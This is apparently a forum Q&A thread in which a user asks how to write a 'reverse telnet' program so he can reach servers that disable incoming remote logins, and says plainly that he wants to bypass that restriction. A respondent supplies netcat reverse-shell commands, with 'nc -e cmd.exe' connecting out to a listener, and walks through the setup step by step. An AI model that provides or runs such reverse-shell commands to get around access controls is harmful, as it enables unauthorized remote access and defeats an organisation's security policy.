We help IT Professionals succeed at work.

reverse telnet

YamSeng asked

I'm thinking of writing a reverse telnet program for linux or generally unix based.

First of all, I would like to know is it possible to write a telnet program with C?  Any better languages with the necessary libraries?

Secondly what I meant by a 'reverse' telnet program is,
if I have a server that disable incoming remote login sessions(for security reasons), and if I'm outside my intranet, that means I can't access my home area or mails.

So I'm thinking of writing a reverse telnet program so that the program will telnet to the external IP address I put in from my server, and opens a window at the external computer just as if I'm doing a normal remote login.  

Watch Question

Steve JenningsSr Manager Cloud Networking Ops

There's already a number of reverse telnet programs . . . search the internet from google.com.

It would seem that if you write a reverse telnet program in any language other than C you will have to write a whole lot of stuff that's already been written. The original implementation of Telnet is written in C and takes advantage of all of the existing IP header info.

And yes, the way the app works is that you launch an application toward your "server" which has a client listening on a non-blocked port which then originates a connection to your telnet server.

Good luck



What I'm planning to do is similar to the reverse telnet programs.  But I want to trigger it thru a email notification or maybe a webpage CGI script.  And there may also be some slight difference to the normal reverse telnet programs.....So I'm thinking of writing it myself in C which I believe if there's alot of libraries available and example codes, it shouldn't be too difficult.

From the results of google I can see a few of the reverse telnet programs on the net.  But it seems that the way they trigger the reverse telnet is different from mine.  It is something more complex, not for the layperson to use it.

Correct me if I'm wrong.


after really looking at those reverse telnet programs, I'm beginning to wonder if my meaning of 'reverse' telnet programs is the same kind of what's available in the market.

What I want to achieve is to connect to those servers who have disabled incoming remote login sessions.  I'm trying to bypass it.

So is it still the same as those reverse telnet programs available commercially?



hmm......ok....sorry about my previous comment.  now I think the reverse telnet is more or less similar in nature.

From my understanding right now, for this reverse telnet to work, I have to configure the server to make allowance for reverse telnet.  But if it is on servers that I do not have access to....I think I may not be able to do it.

Hopefully the program that I'm doing can be used on any servers as long as I'm a legitimate user....


Give a look to the NetCat program

there's all the code You need - already in place

search it on the 'net You'll find lot of sites
and what's more You'll get full source code


Found some outdated information about NetCat.  It says...

"About: Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable backend tool that can be used directly or easily driven by other programs time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. "

How can I make use of this program?  Do you have any specific website I can take a look?


seems to be a place for it's source code, but I think it's obseleted.


Alright, I've found the source code for Linux, but still looking for source code for NT.  Not easy as the main website is closed or something.


If You need it for NT try this:


to use it as a reverse telnet daemon You should specify
something like:

nc -vv -e cmd.exe <remotehost> <port>

where <remotehost> and <port> are the address or name and port of the host You wish to connect to; upon successful connection netcat will spawn a cmd.exe with the net result of having a command prompt; the other side of the connection could simply have a netcat listening so that the inbound connection will receive the shell.

To test it You could run two copies of netcat on Your machine; one running in listen mode; the other running as specified above; after running the second copy You should have an interactive cmd prompt ready in the first copy window.

Let me know


oops I forgot the "main" link


this is the original link since l0pht was taken by @stake

and be sure to read THIS:




hmm.....that means nc can do something like a telnet program.....but maybe with more specific features.

But can nc do the following?
Instead of client initiating a connection to server, let server initiate a connection to client, BUT letting the client have a command prompt as if client initiated the connection?

I just said it; read BETTER My comment above !

I'll explain it again

Server side (outbound):

nc -vv -e cmd.exe client_ip client_port

Client side (inbound):

nc -vv -L -p client_port

to put down some numbers; let's say You have an office
machine which must initiate the connection toward Your home machine; the home machine has IP
now the first thing to do is start netcat onto the home
machine with the command line:

nc -vv -L -p 888

now the home machine will be listening on port 888
the next thing is connecting from the office machine to the home machine with the command:

nc -vv -e cmd.exe 888

when You press enter You'll have a command prompt on the home machine and that command prompt will be running on the office machine

I hope it's clear now


thanks for the explaination.  It's really clear now and I do really appreciate it.

Apparently, I'm someone with zero(0) knowledge on such networking stuff.  Not that I didn't read your comment, but I was just confused.....and didn't know what that means....